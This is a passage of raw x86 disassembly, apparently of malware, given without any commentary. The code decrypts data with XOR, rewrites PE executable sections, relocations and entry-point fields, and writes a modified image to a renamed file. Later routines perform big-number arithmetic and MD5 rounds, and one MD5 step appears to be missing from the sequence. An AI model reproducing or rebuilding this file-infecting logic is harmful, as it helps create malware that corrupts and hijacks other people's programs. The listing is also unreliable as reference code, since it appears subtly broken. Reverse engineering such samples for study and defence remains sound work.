lea eax, [ebp+var_31ED4]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10011638h
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
movsx edx, word ptr ds:10013218h
sub edx, 3
add eax, edx
mov [ebp+var_424], eax
jmp short loc_423E09
; ---------------------------------------------------------------------------
loc_423DEF: ; CODE XREF: sub_423353+AC5�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_423E09: ; CODE XREF: sub_423353+A9A�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_423DEF
mov eax, ds:100131ECh
sub eax, 8
mov [ebp+var_18], eax
mov eax, ds:100131E8h
dec eax
mov [ebp+var_440], eax
jmp loc_424077
; ---------------------------------------------------------------------------
loc_423E36: ; CODE XREF: sub_423353+D34�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F44], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F44]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F48]
mov esi, edx
add esi, eax
mov eax, ds:10013184h
add eax, ds:10013094h
sub eax, 8
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_423ECE
mov eax, ds:10013228h
sub eax, 2
cmp byte ptr [ebx+eax], 72h
jnz short loc_423ECE
mov eax, ds:100131CCh
dec eax
cmp byte ptr [ebx+eax], 63h
jnz short loc_423ECE
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_424071
; ---------------------------------------------------------------------------
loc_423ECE: ; CODE XREF: sub_423353+B51�j
; sub_423353+B5F�j ...
mov eax, ds:100130D4h
movsx edx, word ptr ds:100131FCh
add eax, edx
sub eax, 0Bh
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_423F26
movsx eax, word ptr ds:10013118h
add eax, ds:1001317Ch
sub eax, 7
cmp byte ptr [ebx+eax], 65h
jnz short loc_423F26
mov eax, ds:100130ACh
add eax, ds:1001326Ch
sub eax, 5
cmp byte ptr [ebx+eax], 61h
jnz short loc_423F26
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1184], eax
jmp loc_424071
; ---------------------------------------------------------------------------
loc_423F26: ; CODE XREF: sub_423353+B90�j
; sub_423353+BA6�j ...
mov eax, ds:10013094h
mov edx, eax
sub edx, 6
cmp byte ptr [ebx+edx], 2Eh
jnz short loc_423F57
movsx edx, word ptr ds:10013218h
sub edx, 4
cmp byte ptr [ebx+edx], 69h
jnz short loc_423F57
add eax, ds:10013188h
dec eax
cmp byte ptr [ebx+eax], 61h
jz loc_424071
loc_423F57: ; CODE XREF: sub_423353+BE1�j
; sub_423353+BF1�j
push ebx
push esi
call dword ptr ds:1000F1F4h
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, ds:10013280h
add eax, 8
push eax
mov eax, ds:10013198h
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10011644h
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F40], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_41F094
add esp, 1Ch
mov [ebp+var_10], eax
mov eax, ds:100130B8h
sub eax, 2
cmp byte ptr [ebx+eax], 64h
jnz short loc_42401A
mov eax, [ebp+var_31F40]
cmp [ebp+var_10], eax
jbe short loc_42401A
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F4C], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_42401A: ; CODE XREF: sub_423353+CA5�j
; sub_423353+CB0�j
movsx eax, word ptr ds:10013250h
movsx edx, word ptr ds:10013180h
lea eax, [eax+edx+0FFBh]
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_41F094
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10011638h
add esp, 14h
loc_424071: ; CODE XREF: sub_423353+B76�j
; sub_423353+BCE�j ...
inc [ebp+var_440]
loc_424077: ; CODE XREF: sub_423353+ADE�j
mov eax, [ebp+var_848]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_423E36
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_42409C: ; CODE XREF: sub_423353+F90�j
mov eax, ds:10013134h
movsx edx, word ptr ds:10013150h
add eax, edx
sub eax, 10h
mov [ebp+var_1C], eax
jmp short loc_42410E
; ---------------------------------------------------------------------------
loc_4240B2: ; CODE XREF: sub_423353+DC1�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_4240CE
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_4240CE: ; CODE XREF: sub_423353+D6E�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_42410B
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_424116
; ---------------------------------------------------------------------------
loc_42410B: ; CODE XREF: sub_423353+D94�j
inc [ebp+var_1C]
loc_42410E: ; CODE XREF: sub_423353+D5D�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_4240B2
loc_424116: ; CODE XREF: sub_423353+DB6�j
mov eax, ds:1001315Ch
add eax, ds:10013154h
sub eax, 10h
mov [ebp+var_428], eax
jmp loc_4242A9
; ---------------------------------------------------------------------------
loc_42412F: ; CODE XREF: sub_423353+F62�j
mov eax, [ebp+var_428]
mov edx, ds:1001328Ch
movsx ecx, word ptr ds:10013264h
add edx, ecx
sub edx, 7
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F44], eax
mov ax, [eax]
mov word ptr [ebp+var_31F40], ax
movzx eax, word ptr [ebp+var_31F40]
mov edx, ds:10013224h
add edx, ds:1001318Ch
sub edx, 5
cmp eax, edx
jz loc_4242BB
movzx edi, word ptr [ebp+var_31F40]
movsx edx, word ptr ds:10013178h
mov ecx, ds:100131B0h
lea ecx, [edx+ecx+1]
sar edi, cl
mov word ptr [ebp+var_31F48+2], di
movzx edi, word ptr [ebp+var_31F40]
movsx ecx, word ptr ds:10013178h
shl edi, cl
mov word ptr [ebp+var_31F40+2], di
movzx edi, word ptr [ebp+var_31F40+2]
movsx edx, word ptr ds:100130D8h
add edx, ds:1001312Ch
mov ecx, edx
sub ecx, 6
sar edi, cl
mov word ptr [ebp+var_31F40+2], di
movzx eax, word ptr [ebp+var_31F40+2]
movsx edx, word ptr ds:100130B0h
sub edx, 7
cmp eax, edx
jnz short loc_424203
mov eax, ds:1001318Ch
add eax, ds:100130A0h
sub eax, 4
cmp [ebp+var_428], eax
jnz loc_4242BB
loc_424203: ; CODE XREF: sub_423353+E94�j
mov eax, [ebp+var_848]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
mov [ebp+var_31F4C], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
mov [ebp+var_31F50], eax
sub eax, [ebp+var_31F4C]
mov [ebp+var_31F54], eax
movzx eax, word ptr [ebp+var_31F48+2]
movsx edx, word ptr ds:100131F0h
movsx ecx, word ptr ds:10013250h
add edx, ecx
dec edx
cmp eax, edx
jnz short loc_424299
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F40+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F58], eax
mov edx, [ebp+var_31F54]
add [eax], edx
loc_424299: ; CODE XREF: sub_423353+F19�j
movsx eax, word ptr ds:10013178h
sub eax, 2
add [ebp+var_428], eax
loc_4242A9: ; CODE XREF: sub_423353+DD7�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_42412F
loc_4242BB: ; CODE XREF: sub_423353+E21�j
; sub_423353+EAA�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_848]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_42409C
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1188], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
cmp [ebp+var_1180], 0
jnz short loc_424326
add eax, 60h
mov edx, [ebp+var_848]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_848]
mov edx, [edx+68h]
add [eax], edx
loc_424326: ; CODE XREF: sub_423353+FB2�j
mov eax, [ebp+var_8]
mov edx, ds:1001309Ch
add edx, 4
movsx ecx, word ptr ds:10013178h
add edx, ecx
mov [eax+44h], dx
mov edx, ds:100130ECh
add edx, ds:100130A8h
sub edx, 2
mov [eax+1Ah], dl
mov edx, ds:100131B8h
add edx, ds:10013184h
sub edx, 5
mov [eax+46h], dx
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EE0], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EE0]
add eax, [edx+1Ch]
sub eax, [ebp+var_1184]
mov [ebp+var_31EE4], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EE8], eax
mov eax, [eax]
mov [ebp+var_1058], eax
mov eax, ds:100130DCh
sub eax, 3
mov [ebp+var_24], eax
jmp short loc_4243F3
; ---------------------------------------------------------------------------
loc_4243B2: ; CODE XREF: sub_423353+10A6�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_4243F0
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_118C], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1194], edi
jmp short loc_4243FB
; ---------------------------------------------------------------------------
loc_4243F0: ; CODE XREF: sub_423353+1079�j
inc [ebp+var_24]
loc_4243F3: ; CODE XREF: sub_423353+105D�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_4243B2
loc_4243FB: ; CODE XREF: sub_423353+109B�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1194]
add eax, [ebp+var_1058]
sub eax, [ebp+var_118C]
mov [ebp+var_1190], eax
mov eax, [ebp+var_848]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_424701
; ---------------------------------------------------------------------------
loc_42443C: ; CODE XREF: sub_423353+13BA�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F40], edx
movzx ecx, byte ptr [edx+eax]
mov edi, ds:1001326Ch
add edi, 0E0h
cmp ecx, edi
jnz loc_424594
mov ecx, ds:100131E8h
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
movsx edi, word ptr ds:10013170h
add edi, ds:100131D0h
sub edi, 9
cmp ecx, edi
jnz loc_424594
movsx ecx, word ptr ds:100130B0h
sub ecx, 5
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, ds:10013090h
movsx edx, word ptr ds:10013174h
add edi, edx
mov edx, edi
sub edx, 0Ah
cmp ecx, edx
jnz loc_424594
mov edx, ds:100131E8h
add edx, 2
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F40]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word ptr ds:10013264h
movsx edi, word ptr ds:10013230h
add ecx, edi
sub ecx, 0Fh
cmp edx, ecx
jnz loc_424594
movsx edx, word ptr ds:10013100h
inc edx
add eax, edx
mov edx, [ebp+var_31F40]
movzx eax, byte ptr [edx+eax]
movsx edx, word ptr ds:10013260h
sub edx, 2
cmp eax, edx
jnz loc_424594
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1188]
mov [ebp+var_31F48], eax
movsx eax, word ptr ds:10013180h
add eax, 0FFFFFFFBh
sub eax, [ebp+var_31F44]
add eax, [ebp+var_31F48]
mov edx, ds:10013274h
inc edx
movsx ecx, word ptr ds:100130C0h
add edx, ecx
sub eax, edx
mov [ebp+var_31F4C], eax
movsx edi, word ptr ds:100130C0h
movsx edx, word ptr ds:10013150h
add edi, edx
mov edx, [ebp+var_C]
mov ecx, ds:10013238h
inc ecx
add ecx, ds:100130C8h
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-28h], ecx
loc_424594: ; CODE XREF: sub_423353+1107�j
; sub_423353+112D�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F44], edx
movzx ecx, byte ptr [edx+eax]
movsx edi, word ptr ds:100131E0h
mov edx, ds:10013128h
lea edx, [edi+edx+0DCh]
cmp ecx, edx
jnz loc_4246FE
mov edx, ds:100130A0h
sub edx, 3
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
movsx ecx, word ptr ds:1001324Ch
sub ecx, 9
cmp edx, ecx
jnz loc_4246FE
mov edx, ds:1001318Ch
movsx ecx, word ptr ds:1001322Ch
add edx, ecx
sub edx, 5
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F44]
movzx edx, byte ptr [edx+ecx]
mov ecx, ds:100131E4h
movsx edi, word ptr ds:10013150h
add ecx, edi
sub ecx, 0Ch
cmp edx, ecx
jnz loc_4246FE
mov edx, ds:10013210h
movsx ecx, word ptr ds:10013104h
add ecx, edx
sub ecx, 6
mov edi, eax
add edi, ecx
mov ecx, [ebp+var_31F44]
movzx ecx, byte ptr [ecx+edi]
mov edi, ds:1001325Ch
sub edi, 8
cmp ecx, edi
jnz loc_4246FE
movsx ecx, word ptr ds:10013250h
lea edx, [edx+ecx+2]
add eax, edx
mov edx, [ebp+var_31F44]
movzx eax, byte ptr [edx+eax]
movsx edx, word ptr ds:10013264h
add edx, ds:1001317Ch
sub edx, 0Eh
cmp eax, edx
jnz short loc_4246FE
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_1190]
mov [ebp+var_31F4C], eax
mov eax, ds:100131ACh
add eax, 0FFFFFFFAh
sub eax, [ebp+var_31F48]
add eax, [ebp+var_31F4C]
movsx edx, word ptr ds:10013178h
add edx, ds:100130A0h
sub edx, 4
sub eax, edx
mov [ebp+var_31F50], eax
movsx edi, word ptr ds:10013150h
add edi, ds:1001309Ch
mov edx, [ebp+var_C]
mov ecx, ds:10013268h
add ecx, ds:1001311Ch
sub ecx, 8
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-34h], ecx
loc_4246FE: ; CODE XREF: sub_423353+1267�j
; sub_423353+1290�j ...
inc [ebp+var_C]
loc_424701: ; CODE XREF: sub_423353+10E4�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_42443C
push [ebp+var_1070]
call dword ptr ds:10011654h
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000F1F4h
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_42473B: ; CODE XREF: sub_423353+13ED�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_42473B
mov [ebp+var_31ED8], eax
movsx edx, word ptr ds:100130A4h
sub edx, 3
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED8]
mov edx, ds:1001323Ch
add edx, ds:10013154h
sub edx, 0Ah
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED8]
movsx edx, word ptr ds:100131FCh
movsx ecx, word ptr ds:10013218h
add edx, ecx
sub edx, 9
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, ds:100130D4h
sub eax, 6
push eax
push 2
push 0
movsx eax, word ptr ds:100131E0h
movsx edx, word ptr ds:100131C0h
add eax, edx
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:10012788h
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:10012B8Ch
push [ebp+var_1070]
call dword ptr ds:10011654h
push [ebp+var_4]
call dword ptr ds:1000F61Ch
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:10010364h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000D008h
mov eax, 1
jmp short loc_424846
; ---------------------------------------------------------------------------
loc_42482F: ; CODE XREF: sub_423353+C3�j
; sub_423353+DD�j ...
push [ebp+var_1070]
call dword ptr ds:10011654h
push [ebp+var_4]
call dword ptr ds:1000F61Ch
xor eax, eax
loc_424846: ; CODE XREF: sub_423353+5F�j
; sub_423353+14DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_423353 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42484B proc near ; CODE XREF: .data:0041F33E�p
; .data:0041F401�p
var_1000C = dword ptr -1000Ch
var_10003 = byte ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_425379
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, ds:10010260h
cmp [ebp+arg_4], 43h
jnz short loc_424870
lea edi, ds:1000F0F0h
loc_424870: ; CODE XREF: sub_42484B+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_42492A
push 0
push 0
push esi
push edi
call dword ptr ds:10012B9Ch
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:1000D028h
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_4248C2: ; CODE XREF: sub_42484B+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4248C2
mov edx, ds:10013238h
add edx, 1
movsx ecx, word ptr ds:100131C0h
add edx, ecx
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, ds:100130C8h
add ebx, ds:10013258h
mov edx, [ebp+var_4]
mov [ebp+ebx*4+var_1000C+1], edx
push 0
push 0
push esi
push edi
call dword ptr ds:10012B9Ch
push 0
lea eax, [ebp+var_4]
push eax
movsx eax, word ptr ds:10013264h
sub eax, 5
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call dword ptr ds:10012B8Ch
push edi
call dword ptr ds:10011654h
loc_42492A: ; CODE XREF: sub_42484B+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_42484B endp
; ---------------------------------------------------------------------------
db 90h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424931 proc near ; CODE XREF: sub_41C1D1+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, ds:10014B28h
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_4249FC
xor edx, edx
loc_424961: ; CODE XREF: sub_424931+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_424973
mov edx, [ebp+arg_4]
call sub_42498D
loc_424973: ; CODE XREF: sub_424931+38�j
lea edx, ds:10014B28h
call sub_42498D
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_424961
popa
pop ebp
retn 10h
sub_424931 endp
; ---------------------------------------------------------------------------
dw 8B2Eh
db 0C0h
; =============== S U B R O U T I N E =======================================
sub_42498D proc near ; CODE XREF: sub_424931+3D�p
; sub_424931+48�p
lea edi, ds:10014AE8h
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, ds:10014B28h
call sub_4249FC
loc_4249A7: ; CODE XREF: sub_42498D+5D�j
lea edi, ds:10014AE8h
mov ecx, 10h
xor eax, eax
loc_4249B4: ; CODE XREF: sub_42498D+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_4249B4
call sub_424A0D
bt ds:10014B28h, ebx
jnb short loc_4249E9
mov esi, edx
lea edi, ds:10014AE8h
xor eax, eax
mov ecx, 10h
loc_4249D8: ; CODE XREF: sub_42498D+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_4249D8
call sub_424A0D
loc_4249E9: ; CODE XREF: sub_42498D+3A�j
dec ebx
jns short loc_4249A7
mov edi, edx
lea esi, ds:10014AE8h
mov ecx, 10h
rep movsd
retn
sub_42498D endp
; =============== S U B R O U T I N E =======================================
sub_4249FC proc near ; CODE XREF: sub_424931+29�p
; sub_42498D+15�p
mov ebx, 1FFh
loc_424A01: ; CODE XREF: sub_4249FC+B�j
bt [edi], ebx
jb short locret_424A09
dec ebx
jnz short loc_424A01
locret_424A09: ; CODE XREF: sub_4249FC+8�j
retn
sub_4249FC endp
; ---------------------------------------------------------------------------
dw 8B2Eh
db 0C0h
; =============== S U B R O U T I N E =======================================
sub_424A0D proc near ; CODE XREF: sub_42498D+2E�p
; sub_42498D+57�p
lea esi, ds:10014AE8h
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_424A1B: ; CODE XREF: sub_424A0D+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_424A44
ja short loc_424A28
dec ecx
jns short loc_424A1B
loc_424A28: ; CODE XREF: sub_424A0D+16�j
mov esi, [ebp+14h]
lea edi, ds:10014AE8h
xor eax, eax
mov ecx, 10h
loc_424A38: ; CODE XREF: sub_424A0D+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_424A38
locret_424A44: ; CODE XREF: sub_424A0D+14�j
retn
sub_424A0D endp
; =============== S U B R O U T I N E =======================================
sub_424A45 proc near ; CODE XREF: sub_424A96+32�p
; sub_424A96+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_424A45 endp
; =============== S U B R O U T I N E =======================================
sub_424A52 proc near ; CODE XREF: sub_424A96+219�p
; sub_424A96+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_424A52 endp
; =============== S U B R O U T I N E =======================================
sub_424A5F proc near ; CODE XREF: sub_424A96+420�p
; sub_424A96+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_424A5F endp
; =============== S U B R O U T I N E =======================================
sub_424A66 proc near ; CODE XREF: sub_424A96+627�p
; sub_424A96+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_424A66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424A6F proc near ; CODE XREF: sub_41E6CD+73�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_424A6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424A96 proc near ; CODE XREF: sub_41E6CD+8B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov ds:10014B68h, eax
mov eax, [edi+4]
mov ds:10014B6Ch, eax
mov eax, [edi+8]
mov ds:10014B70h, eax
mov eax, [edi+0Ch]
mov ds:10014B74h, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A45
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A45
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A45
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A45
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A45
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A45
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A45
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A45
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A45
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A45
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A45
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A45
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_424A45
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_424A45
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_424A45
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_424A52
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
